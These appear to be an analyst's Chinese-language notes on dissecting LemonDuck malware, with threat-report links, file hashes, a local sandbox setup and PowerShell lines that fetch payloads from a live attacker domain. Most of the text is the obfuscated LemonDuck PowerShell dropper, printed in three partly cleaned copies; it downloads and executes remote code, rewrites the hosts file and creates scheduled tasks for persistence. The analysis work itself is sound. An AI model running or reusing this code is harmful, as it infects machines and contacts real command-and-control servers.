杂货1223

PE注入 - Macchiato


一次对钓鱼邮件攻击者的深度溯源分析-安全客 - 安全资讯平台

https://threatbook.cn/ppt/Konni%E6%9C%A8%E9%A9%AC%E5%B1%95%E5%BC%80%E6%96%B0%E4%B8%80%E8%BD%AE%E9%92%93%E9%B1%BC%E6%94%BB%E5%87%BB.pdf

MD5
98bf04d3d6e25c0cac4ac6af604bcdbf
779c89b9404bdd69547c28885167f131
d0b03daf3c84987768bd4ce8e2a77548
51f6eba99e2b33e5458d78e41a130fe2
db50d9392ea9dd0efceb2364f0e2f187
5d4d94ee7e06bbb0af9584119797b23a
f3b25701fe362ec84616a93a45ce9998
df5c8f7677a3361d17cc1ba820436ce9

https://www.tj-un.com/pdf/LemonDuck.pdf

a.jsp  下载 http://127.0.0.1:43669/1/summary

http://d.ackng.com/m6.bin?

http://d.ackng.com/if.bin?
https://s.threatbook.com/report/file/eacddae1b05647663bfd625207135f989c2171d5c4fc3c030dbc8e13ca7c93a9 （下载 if.bin）

修改 hosts 文件，把上述域名的请求指向 127.0.0.1，从本地搭建的服务上下载文件
搭建一个jsp服务器

sudo inetsim --data data --conf inetsim.conf
 

(New-Object Net.WebClient)."downloaddata"('http://d.ackng.com/if.bin?') ok?

(New-Object Net.WebClient).DownloadFile('http://d.ackng.com/m6.bin?', 'm6.bin')  ok

readme.doc MD5:48DF6A48121622D0B67A75BB928F80D0

kr.bin md5:e04acec7ab98362d87d1c53d84fc4b03

report.jsp md5:6038cd68f69ac785118bb5b0d058b667

https://www.fireeye.com/content/dam/fireeye-www/services/freeware/sdl-apatedns.zip

 (' (736xhCv=ajf?xhC{v}_ajf+('+'Get-Dat'+'e -Format ZnfyyyyMM'+'ddZn736+736f)

x'+'hC736+736t'+'mps=Znf-c ajfZnf+Z'+'736+736nfxh736+736CLemon_Duck=ZnfZnf'+'_'+'TZnfZ7'+'36+736nf;xhCx=ZnfZnf_736+73'+'6U1ZnfZnf+ZnfZnf_U2Znf736+736Znf;REP;xhCy=Zn736+7'+'36fZnfhttp://Znf'+'Znf+xhCx+ZnfZnf/CTL.jsZnfZnf;xhCz=xhCy+ZnfZnf736+736pZnf+xhCv+ZnfZnfZnf;xhCm736+736=73'+'6+736(Ne6o8'+'w-Obj6o8ect Net.WebC'+'6o8lient).ajfDownloadDataajf(xhCy736+736);[System.'+'Security.Cryptog736+736raphy.MD5]::Create().Comp'+'uteHash(xh736+736Cm)rKYforeach{'+'x'+'hCs+=xhC_.ToString(ZnfZnfx2Znf'+'Znf)};if(xhCs-eqZnfZnfa49add2a8eeb7e89b9d743c0af0e1443ZnfZnf){IEX(736+736-join[char[]]xhCm)}736+736ajfZn'+'f

xhCs'+'a=([Security.Principal.WindowsPrincipal][Security.Prin736+736cipal.WindowsIdentity]::GetCurrent'+'()).IsInR'+'ole(['+'Se'+'curity.Principal.WindowsBuiltInRole] ajfAdminist'+'ratorajf)

function getRan(){return -join([char[]](48..736+73657+65..9'+'0+97..122)'+'rKYGe736+736t-Random -Count (6+(Get-Random)%6))}

xhCus=@(Znft.tr2q.comZnf,Znft.awcna.comZnf,Znft.amy'+'nx.comZnf)

xhCus+=(getRan)7'+'36+736+Znf.cnZnf;x736+736hCus'+'+=(getRan)+Znf.jp736+736Znf;xhCus+=(getRan)+'+'Znf.krZ'+'nf

xhCstsrv = New-Objec'+'t -ComObje'+'ct 736+736Schedu'+'le.Service

xhCstsrv.Connect(xhCe'+'nv:COMPUT'+'ERNAME)

attrib -R C:K3MWI'+'NDOWSK3Msystem32K3Md736+736riversK3MetcK3Mhosts

try{xhCdoit=xhCstsrv.GetFol'+'der(ajfK3Maj'+'f).GetTask(ajfbl'+'ueteaajf)}catch{}

if(-not xhCdoit){

    foreach(xhCu in xhCus){7'+'36+736

        xhCi = [array]::'+'IndexOf'+'(xhCus,xhCu)

        if(xhCi%3 -eq 0){xhCt736+736nf=ZnfZnf}

        if(xhCi%3 -eq 1){xhCtnf=getR'+'a'+'736+'+'736n}736+736'+'

        if(xhCi%3 -eq 2){if(xhCsa)736+736{'+'xhCtnf=ZnfMicroSoftK3MWindo'+'w'+'sK3MZnf+(getRan)}else{xhCtnf=ge736+736tRan}}

        xhCtn = getRan

        if(xhCsa){

            schtasks /create /ru s7'+'36+736yst736+736em /sc MINUTE /mo 60 /tn ajfxhCtnfK3MxhCtnajf /F /tr ajfpowershell736+736 PS_CMDajf'+'

        } el'+'se {

            schta'+'sks /creat'+'e /sc MINUTE /mo 60 /tn ajfxhCtnfK3MxhCtn736+736ajf /F /tr ajfpowershell PS_CMD'+'ajf

    '+'    }

        start-sle'+'ep 736+7361

736+736        xh'+'Cfolder=xhCstsrv.GetFolder(ajfK3MxhC736+736tnfajf'+')

        xhCtaskitem=xhCfolder.G736+736etTasks(1)

        foreach(xhCtask i'+'n xhCtas'+'kitem){

            foreach (xhCaction in xhCtas'+'k.Defi'+'nition.Actions) {

                try{

736+736                    if(xh736+736Cact'+'ion.Arguments.Contains(ajfPS_CMDajf)){    

                        xhCctl=Znfx'+'Znf

                        if(xhCi -ge 3)73'+'6+736{xhCrep=Znf[Net.Dns]::GetHostAddresses(ZnfZnfZnf+xhCu'+'s[xhCi-3].substring(0,5)+ZnfZnfZnf736+7'+'36+Znf736+736Zn'+'f736+7'+'36Znf+xhCus[xhCi-3].substring(5)+ZnfZnfZnf)[0].IPAddressToString+Znf'+'Znf ZnfZnf+736'+'+736xhCxrKYout-file -'+'ajfencoding'+'ajf as6o8ci6o8i c:K3MwindowsK3Msystem32K3MdriversK3MetcK3MhostsZnf;'+'xhCctl='+'ZnfwZnf}

                        xhCfolder.RegisterTask(xhCtas736+736k.Name, xhCtask.Xml.replace(ajfPS_CMDajf,xhCtmps.replace(Znf_TZnf,ajfxhCtnfK3MxhCtnajf).replac'+'e(Z'+'nf_U1Znf,xhCu.substri736+736n736+736g736+736(0,5)).repla736+736ce(Znf_U2Znf,xhCu.substring(5)).rep'+'lace(ZnfREPZnf,xhCrep).r736+736eplace(ZnfCTLZnf,xhCctl)), 4, x'+'hCnull, xhCnull, 736+7361, xhCnull'+')rKYout-n736+736ull

                    }

                }catch{}

            }

        }

        schtas'+'ks736+736 /run /tn ajfxhCtnfK3MxhCtn'+'ajf

    '+'    start-'+'sleep 5

    }

    if(x'+'hC'+'sa){

        schtasks /creat'+'e /ru system'+' /sc MINUTE /mo 120 /tn bluetea /F /tr ajfblueteaajf

    } else {736+736

        schtasks /create /sc MINUTE /mo 120 /t'+'n bluetea /F /tr ajfblueteaajf

    }

}

736+736schtasks /delete '+'/tn Rtsa2 /F

schtasks /delete /tn Rts736+736a1 /F

schtasks /delete /tn Rtsa /F

736).REPLace(736xhC736,736O0K736).REPL'+'ace('+'([char]114+[char]75+[c'+'har]89),'+'7366U'+'S736).REPLace(([char]90+[c'+'har'+']110+[char]102),[STRing][char]39).REPLace((['+'char]'+'97+[char]106+[char]102),[STRing][c'+'har]34).R'+'EPLace(([char]54+[char]111'+'+[char]56),736UvB736).REPLace(([char]75+[char]51+[char]7'+'7),736KOW736)6US&( O0KsHELliD[1]+O0KSHeLLiD[13]+736X'+'736)

').REPLaCe(([chaR]55+[chaR]51+[chaR]54),[sTRIng][chaR]39).REPLaCe(([chaR]75+[chaR]79+[chaR]87),[sTRIng][chaR]92).REPLaCe('UvB',[sTRIng][chaR]96).REPLaCe(([chaR]79+[chaR]48+[chaR]75),[sTRIng][chaR]36).REPLaCe('6US',[sTRIng][chaR]124) | . ( $sHELlID[1]+$SHELliD[13]+'x')

颠倒顺序后的数据：

 (' (736xhCv=ajf?xhC{v}_ajf+('+'Get-Dat'+'e -Format ZnfyyyyMM'+'ddZn736+736f)

x'+'hC736+736t'+'mps=Znf-c ajfZnf+Z'+'736+736nfxh736+736CLemon_Duck=ZnfZnf'+'_'+'TZnfZ7'+'36+736nf;xhCx=ZnfZnf_736+73'+'6U1ZnfZnf+ZnfZnf_U2Znf736+736Znf;REP;xhCy=Zn736+7'+'36fZnfhttp://Znf'+'Znf+xhCx+ZnfZnf/CTL.jsZnfZnf;xhCz=xhCy+ZnfZnf736+736pZnf+xhCv+ZnfZnfZnf;xhCm736+736=73'+'6+736(Ne6o8'+'w-Obj6o8ect Net.WebC'+'6o8lient).ajfDownloadDataajf(xhCy736+736);[System.'+'Security.Cryptog736+736raphy.MD5]::Create().Comp'+'uteHash(xh736+736Cm)rKYforeach{'+'x'+'hCs+=xhC_.ToString(ZnfZnfx2Znf'+'Znf)};if(xhCs-eqZnfZnfa49add2a8eeb7e89b9d743c0af0e1443ZnfZnf){IEX(736+736-join[char[]]xhCm)}736+736ajfZn'+'f

xhCs'+'a=([Security.Principal.WindowsPrincipal][Security.Prin736+736cipal.WindowsIdentity]::GetCurrent'+'()).IsInR'+'ole(['+'Se'+'curity.Principal.WindowsBuiltInRole] ajfAdminist'+'ratorajf)

function getRan(){return -join([char[]](48..736+73657+65..9'+'0+97..122)'+'rKYGe736+736t-Random -Count (6+(Get-Random)%6))}

xhCus=@(Znft.tr2q.comZnf,Znft.awcna.comZnf,Znft.amy'+'nx.comZnf)

xhCus+=(getRan)7'+'36+736+Znf.cnZnf;x736+736hCus'+'+=(getRan)+Znf.jp736+736Znf;xhCus+=(getRan)+'+'Znf.krZ'+'nf

xhCstsrv = New-Objec'+'t -ComObje'+'ct 736+736Schedu'+'le.Service

xhCstsrv.Connect(xhCe'+'nv:COMPUT'+'ERNAME)

attrib -R C:K3MWI'+'NDOWSK3Msystem32K3Md736+736riversK3MetcK3Mhosts

try{xhCdoit=xhCstsrv.GetFol'+'der(ajfK3Maj'+'f).GetTask(ajfbl'+'ueteaajf)}catch{}

if(-not xhCdoit){

    foreach(xhCu in xhCus){7'+'36+736

        xhCi = [array]::'+'IndexOf'+'(xhCus,xhCu)

        if(xhCi%3 -eq 0){xhCt736+736nf=ZnfZnf}

        if(xhCi%3 -eq 1){xhCtnf=getR'+'a'+'736+'+'736n}736+736'+'

        if(xhCi%3 -eq 2){if(xhCsa)736+736{'+'xhCtnf=ZnfMicroSoftK3MWindo'+'w'+'sK3MZnf+(getRan)}else{xhCtnf=ge736+736tRan}}

        xhCtn = getRan

        if(xhCsa){

            schtasks /create /ru s7'+'36+736yst736+736em /sc MINUTE /mo 60 /tn ajfxhCtnfK3MxhCtnajf /F /tr ajfpowershell736+736 PS_CMDajf'+'

        } el'+'se {

            schta'+'sks /creat'+'e /sc MINUTE /mo 60 /tn ajfxhCtnfK3MxhCtn736+736ajf /F /tr ajfpowershell PS_CMD'+'ajf

    '+'    }

        start-sle'+'ep 736+7361

736+736        xh'+'Cfolder=xhCstsrv.GetFolder(ajfK3MxhC736+736tnfajf'+')

        xhCtaskitem=xhCfolder.G736+736etTasks(1)

        foreach(xhCtask i'+'n xhCtas'+'kitem){

            foreach (xhCaction in xhCtas'+'k.Defi'+'nition.Actions) {

                try{

736+736                    if(xh736+736Cact'+'ion.Arguments.Contains(ajfPS_CMDajf)){    

                        xhCctl=Znfx'+'Znf

                        if(xhCi -ge 3)73'+'6+736{xhCrep=Znf[Net.Dns]::GetHostAddresses(ZnfZnfZnf+xhCu'+'s[xhCi-3].substring(0,5)+ZnfZnfZnf736+7'+'36+Znf736+736Zn'+'f736+7'+'36Znf+xhCus[xhCi-3].substring(5)+ZnfZnfZnf)[0].IPAddressToString+Znf'+'Znf ZnfZnf+736'+'+736xhCxrKYout-file -'+'ajfencoding'+'ajf as6o8ci6o8i c:K3MwindowsK3Msystem32K3MdriversK3MetcK3MhostsZnf;'+'xhCctl='+'ZnfwZnf}

                        xhCfolder.RegisterTask(xhCtas736+736k.Name, xhCtask.Xml.replace(ajfPS_CMDajf,xhCtmps.replace(Znf_TZnf,ajfxhCtnfK3MxhCtnajf).replac'+'e(Z'+'nf_U1Znf,xhCu.substri736+736n736+736g736+736(0,5)).repla736+736ce(Znf_U2Znf,xhCu.substring(5)).rep'+'lace(ZnfREPZnf,xhCrep).r736+736eplace(ZnfCTLZnf,xhCctl)), 4, x'+'hCnull, xhCnull, 736+7361, xhCnull'+')rKYout-n736+736ull

                    }

                }catch{}

            }

        }

        schtas'+'ks736+736 /run /tn ajfxhCtnfK3MxhCtn'+'ajf

    '+'    start-'+'sleep 5

    }

    if(x'+'hC'+'sa){

        schtasks /creat'+'e /ru system'+' /sc MINUTE /mo 120 /tn bluetea /F /tr ajfblueteaajf

    } else {736+736

        schtasks /create /sc MINUTE /mo 120 /t'+'n bluetea /F /tr ajfblueteaajf

    }

}

736+736schtasks /delete '+'/tn Rtsa2 /F

schtasks /delete /tn Rts736+736a1 /F

schtasks /delete /tn Rtsa /F

736).REPLace(736xhC736,736O0K736).REPL'+'ace('+'([char]114+[char]75+[c'+'har]89),'+'7366U'+'S736).REPLace(([char]90+[c'+'har'+']110+[char]102),[STRing][char]39).REPLace((['+'char]'+'97+[char]106+[char]102),[STRing][c'+'har]34).R'+'EPLace(([char]54+[char]111'+'+[char]56),736UvB736).REPLace(([char]75+[char]51+[char]7'+'7),736KOW736)6US&( O0KsHELliD[1]+O0KSHeLLiD[13]+736X'+'736)

').REPLaCe(([chaR]55+[chaR]51+[chaR]54),[sTRIng][chaR]39).REPLaCe(([chaR]75+[chaR]79+[chaR]87),[sTRIng][chaR]92).REPLaCe('UvB',[sTRIng][chaR]96).REPLaCe(([chaR]79+[chaR]48+[chaR]75),[sTRIng][chaR]36).REPLaCe('6US',[sTRIng][chaR]124) | . ( $sHELlID[1]+$SHELliD[13]+'x')

去除字符串拼接（'+'）后、按顺序排列的命令：

 (736xhCv=ajf?xhC{v}_ajf+(Get-Date -Format ZnfyyyyMMddZn736+736f)

xhC736+736tmps=Znf-c ajfZnf+Z736+736nfxh736+736CLemon_Duck=ZnfZnf_TZnfZ736+736nf;xhCx=ZnfZnf_736+736U1ZnfZnf+ZnfZnf_U2Znf736+736Znf;REP;xhCy=Zn736+736fZnfhttp://ZnfZnf+xhCx+ZnfZnf/CTL.jsZnfZnf;xhCz=xhCy+ZnfZnf736+736pZnf+xhCv+ZnfZnfZnf;xhCm736+736=736+736(Ne6o8w-Obj6o8ect Net.WebC6o8lient).ajfDownloadDataajf(xhCy736+736);[System.Security.Cryptog736+736raphy.MD5]::Create().ComputeHash(xh736+736Cm)rKYforeach{xhCs+=xhC_.ToString(ZnfZnfx2ZnfZnf)};if(xhCs-eqZnfZnfa49add2a8eeb7e89b9d743c0af0e1443ZnfZnf){IEX(736+736-join[char[]]xhCm)}736+736ajfZnf

xhCsa=([Security.Principal.WindowsPrincipal][Security.Prin736+736cipal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] ajfAdministratorajf)

function getRan(){return -join([char[]](48..736+73657+65..90+97..122)rKYGe736+736t-Random -Count (6+(Get-Random)%6))}

xhCus=@(Znft.tr2q.comZnf,Znft.awcna.comZnf,Znft.amynx.comZnf)

xhCus+=(getRan)736+736+Znf.cnZnf;x736+736hCus+=(getRan)+Znf.jp736+736Znf;xhCus+=(getRan)+Znf.krZnf

xhCstsrv = New-Object -ComObject 736+736Schedule.Service

xhCstsrv.Connect(xhCenv:COMPUTERNAME)

attrib -R C:K3MWINDOWSK3Msystem32K3Md736+736riversK3MetcK3Mhosts

try{xhCdoit=xhCstsrv.GetFolder(ajfK3Majf).GetTask(ajfblueteaajf)}catch{}

if(-not xhCdoit){

    foreach(xhCu in xhCus){736+736

        xhCi = [array]::IndexOf(xhCus,xhCu)

        if(xhCi%3 -eq 0){xhCt736+736nf=ZnfZnf}

        if(xhCi%3 -eq 1){xhCtnf=getRa736+736n}736+736

        if(xhCi%3 -eq 2){if(xhCsa)736+736{xhCtnf=ZnfMicroSoftK3MWindowsK3MZnf+(getRan)}else{xhCtnf=ge736+736tRan}}

        xhCtn = getRan

        if(xhCsa){

            schtasks /create /ru s736+736yst736+736em /sc MINUTE /mo 60 /tn ajfxhCtnfK3MxhCtnajf /F /tr ajfpowershell736+736 PS_CMDajf

        } else {

            schtasks /create /sc MINUTE /mo 60 /tn ajfxhCtnfK3MxhCtn736+736ajf /F /tr ajfpowershell PS_CMDajf

        }

        start-sleep 736+7361

736+736        xhCfolder=xhCstsrv.GetFolder(ajfK3MxhC736+736tnfajf)

        xhCtaskitem=xhCfolder.G736+736etTasks(1)

        foreach(xhCtask in xhCtaskitem){

            foreach (xhCaction in xhCtask.Definition.Actions) {

                try{

736+736                    if(xh736+736Caction.Arguments.Contains(ajfPS_CMDajf)){    

                        xhCctl=ZnfxZnf

                        if(xhCi -ge 3)736+736{xhCrep=Znf[Net.Dns]::GetHostAddresses(ZnfZnfZnf+xhCus[xhCi-3].substring(0,5)+ZnfZnfZnf736+736+Znf736+736Znf736+736Znf+xhCus[xhCi-3].substring(5)+ZnfZnfZnf)[0].IPAddressToString+ZnfZnf ZnfZnf+736+736xhCxrKYout-file -ajfencodingajf as6o8ci6o8i c:K3MwindowsK3Msystem32K3MdriversK3MetcK3MhostsZnf;xhCctl=ZnfwZnf}

                        xhCfolder.RegisterTask(xhCtas736+736k.Name, xhCtask.Xml.replace(ajfPS_CMDajf,xhCtmps.replace(Znf_TZnf,ajfxhCtnfK3MxhCtnajf).replace(Znf_U1Znf,xhCu.substri736+736n736+736g736+736(0,5)).repla736+736ce(Znf_U2Znf,xhCu.substring(5)).replace(ZnfREPZnf,xhCrep).r736+736eplace(ZnfCTLZnf,xhCctl)), 4, xhCnull, xhCnull, 736+7361, xhCnull)rKYout-n736+736ull

                    }

                }catch{}

            }

        }

        schtasks736+736 /run /tn ajfxhCtnfK3MxhCtnajf

        start-sleep 5

    }

    if(xhCsa){

        schtasks /create /ru system /sc MINUTE /mo 120 /tn bluetea /F /tr ajfblueteaajf

    } else {736+736

        schtasks /create /sc MINUTE /mo 120 /tn bluetea /F /tr ajfblueteaajf

    }

}

736+736schtasks /delete /tn Rtsa2 /F

schtasks /delete /tn Rts736+736a1 /F

schtasks /delete /tn Rtsa /F

736)
 
